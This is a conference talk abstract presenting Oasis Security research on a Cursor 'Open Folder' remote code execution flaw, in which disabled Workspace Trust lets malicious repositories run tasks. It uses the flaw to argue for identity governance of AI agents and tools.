AI agents, IDEs, and local LLM tools are rapidly evolving from passive software into some of the most trusted "identities" within our operational environments. To facilitate AI assistance, we routinely approve prompts, disable guardrails, and grant these entities long-lived tokens and privileged roles. With Non-Human Identities (NHIs) now outnumbering human identities by orders of magnitude, this shift represents a massive expansion of the privileged attack surface. Yet, most IAM strategies remain architected around a human-centric model, often failing to apply 'privileged user' governance to AI agents.
In this session, we will present original research from Oasis Security regarding the Cursor "Open Folder" Remote Code Execution (RCE) vulnerability. We will use this discovery as a case study to demonstrate how a single implicit trust decision—specifically Cursor’s default deactivation of VS Code’s "Workspace Trust"—can weaponize an AI-first tool against its owner. We will show how this vulnerability allows malicious repositories to execute unauthorized tasks, leading to the compromise of local developer secrets and lateral movement into downstream NHIs within CI/CD, cloud, and SaaS environments.
Beyond the exploit, we will critique current AI risk frameworks that fail to address the identity lifecycle of agents. Attendees will leave with a pragmatic identity playbook for managing AI tools: defining how to discover these shadow identities, bind them to human accountability, and re-establish "Zero Trust" guardrails without compromising the velocity of AI-driven development.